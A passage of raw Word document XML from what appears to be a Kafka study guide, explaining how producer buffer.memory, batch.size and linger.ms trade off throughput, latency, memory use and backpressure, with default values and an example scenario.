        <w:t xml:space="preserve"> that stores messages before they are sent to the Kafka broker. The size of this buffer can be configured using the buffer.memory parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C5103"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how the producer buffer size impacts message delivery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C9F5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EBE9">
          <v:rect id="_x0000_i3426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73993F0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actors Affected by Producer Buffer Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914678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Batching and Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5956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directly influences how many messages can be batched together before being sent to the Kafka broker. Larger buffer sizes allow the producer to accumulate more messages, resulting in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger batches</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1F3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reduce </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because fewer requests are sent to the broker for a larger number of messages, leading to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B80EA7D"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buffer size is too small, the producer may send smaller batches more frequently, potentially increasing network traffic and decreasing overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB079C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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D96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Conversely, a </w:t>
      </w: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may quickly fill up, causing the producer to block or wait for space to become available in the buffer. This can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow down message production</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the producer is waiting for the broker to acknowledge messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063102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batch.size configuration also plays a role here: a large buffer allows Kafka to accumulate enough messages to fill the batch size and send them efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FE9F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Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E4506"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may introduc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because the producer will wait to fill up the buffer (up to a certain threshold) before sending messages in bulk. While this is efficient in terms of throughput, the trade-off is that there could be a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in delivering individual messages, especially under low message volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AD0CB"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smaller buffer size can lead to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because the producer doesn’t need to wait for many messages to accumulate before sending. However, this can hurt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and increas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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308DEE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mory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B1D34"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increases the amount of memory the producer uses. If your system doesn’t have enough memory, a very large buffer can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out-of-memory error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ystem slowdowns</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C280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 large a buffer size could also cause </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource contention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially when running multiple producers on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618BA7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and Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB51402"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becomes full (i.e., the amount of data in the buffer exceeds the configured buffer.memory), the producer will block and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for space to become available</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can negatively impact the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer’s performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and increase latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD68D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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5C23C"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 will apply </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the buffer is full, slowing down message production until space becomes available. This mechanism prevents producers from overwhelming the brokers, ensuring a steady flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391963C5"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buffer size plays a key role in managing backpressure. A larger buffer gives the producer more room to handle bursts of high throughput without overwhelming the system, but it could also introduc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longer waiting times to fill the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E155835"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n Failures and Retries</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5A25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network failure or a broker issue occurs and the producer fails to send messages, the producer will try to </w:t>
      </w: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s. A larger buffer provides the producer with more opportunity to retry sending messages before the buffer gets full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9219E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if the buffer is too small, it could result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to space constraints, especially under high message rates or network issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8B07F"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420B5">
          <v:rect id="_x0000_i3427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597E276"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Producer Buffer Size Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7991D"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Controls the total amount of memory available to the producer for buffering. If the buffer fills up, the producer will block or throw an exception, depending on the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019DBFB"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33554432 bytes (32 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18FBFC"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creasing this value allows the producer to buffer more messages before they are sent to the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887B72E"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the broker. If the batch size is reached, the producer will send the batch regardless of whether the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B483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16384 bytes (16 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5F0E8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larger batch.size allows more messages to be batched together, improving throughput but possibly increasing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDE826"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Defines how long the producer will wait to fill a batch before sending it to the broker. This introduces a trade-off between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C7FEB19"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0 (send as soon as data is available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426AEA22"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allows more messages to accumulate, increasing batch size and throughput but potentially increasing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5023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A7C280">
          <v:rect id="_x0000_i3428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752554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Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9ECDE7"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configured with the following settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DDE7A"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4D5CB3B4"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7866E1DF"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1DF40DEB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6A50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MB buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB68B6E"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KB batch size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F100580"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04AFFA29"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ith a </w:t>
      </w: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 the producer will be able to accumulate more messages before sending them, improving throughput but possibly introducing latency if the buffer isn't filled quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CB7A1"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 xml:space="preserve"> may lead to faster message delivery (lower latency), but the producer will have to send messages more frequently, potentially reducing throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD994B"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DA75A">
          <v:rect id="_x0000_i3429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEAB30"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9EA1B3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in Kafka has a significant impact on message delivery performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522F175"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reduce latency but could cause more frequent network requests, increasing the load on brokers and potentially lowering throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E618E3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oosing the right buffer size is a balance between throughput and latency, based on your use case, message volume, and system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D59C2D" w14:textId="0907B26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430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D54323" w14:textId="14F5154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58" w:name="_Toc197868072"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss how buffer sizes in the Kafka producer affect message delivery, latency, and throughput</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="858"/>
    </w:p>
    <w:p w14:paraId="73C5CF72" w14:textId="07DBD221" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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Buffer Size in Kafka Producer on Message Delivery, Latency, and Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B442ED"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the producer is responsible for sending messages to Kafka brokers, and it uses an in-memory buffer to temporarily store messages before they are sent. The </w:t>
      </w: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plays a crucial role in how the producer interacts with Kafka brokers, and it impacts </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message deliver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C7830F9"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in-depth analysis of how buffer sizes affect these aspects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBA71C"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F35A4D">
          <v:rect id="_x0000_i3431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646B12C"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Message Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610789D9"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mp; Message Batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The producer uses the buffer to accumulate messages before sending them to Kafka brokers. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger the buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the more messages can be accumulated in memory. Once the buffer reaches the defined size (batch.size), the producer sends a batch of messages to the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794031C1"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ivery Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1B6D8"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 Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With a larger buffer, the producer can send larger batches of messages, which improves efficiency and reduces the overhead of sending messages one-by-one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58904E84"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With a smaller buffer, the producer might send smaller batches more frequently, increasing the overall </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network requests</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and potentially reducing efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320F3D2"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elivery Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12369F46"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parameter also interacts with the buffer size. If set to a value greater than 0 (e.g., 10ms), the producer will wait up to that amount of time to try to fill the buffer with more messages before sending them. This means that </w:t>
      </w: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llow for more messages to be accumulated before being sent, leading to fewer requests to the broker, but it could delay message delivery slightly. </w:t>
      </w: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may result in more frequent but smaller sends, reducing latency but increasing overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54890E0E"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DC0DCC">
          <v:rect id="_x0000_i3432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED0FD2"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atency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984B1E0"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Latency Trade-off</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A895E5"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 larger buffer size can increas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A smaller buffer can result in lower latency since the producer doesn’t need to wait for as many messages to accumulate before sending them. However, sending messages more </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">frequently (without batching) may also increase th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message processing overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which could degrade overall performance if the system has to handle many small messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D5923"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16314FE3"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is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the producer cannot send messages quickly enough, the producer can block and wait for space in the buffer to be freed up. This can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>increase latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the system has high traffic or slow brokers. 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reduces the frequency of blocking but may introduce higher </w:t>
      </w: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 xml:space="preserve"> for individual messages if the batch is not filled quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD26578"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A0C13">
          <v:rect id="_x0000_i3433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B9AAA"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Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB93F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Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B89B61"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A2D9468"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 and Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E55DF"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batch.siz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configurations also play a significant role. If you increase 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DFAE2">
          <v:rect id="_x0000_i3434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB96E7"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Buffer Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D902A6"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with the following configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B474EE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9AAE163"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B957B5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20A9937F"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 MB buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C2F4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 KB batch size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE7CDA"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2E088AAB"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Large Buffer Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC82F0"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ducer can accumulate more messages in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7E93D"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are sent less frequently, which reduces network overhead and increases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BBB778A"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wever, the latency for individual messages may be higher because the producer waits to fill the buffer before sending messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5D3AE"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Small Buffer Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69F4B"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will send messages more frequently, which may result in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849B512"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trade-off is that </w:t>
      </w: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xml:space="preserve"> will be higher, and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could be lower due to the increased number of requests being made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB44F8D"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A2F8">
          <v:rect id="_x0000_i3435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CB02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uffer Size Configurations and Their Effects:</w:t>
      </w:r>
    </w:p>
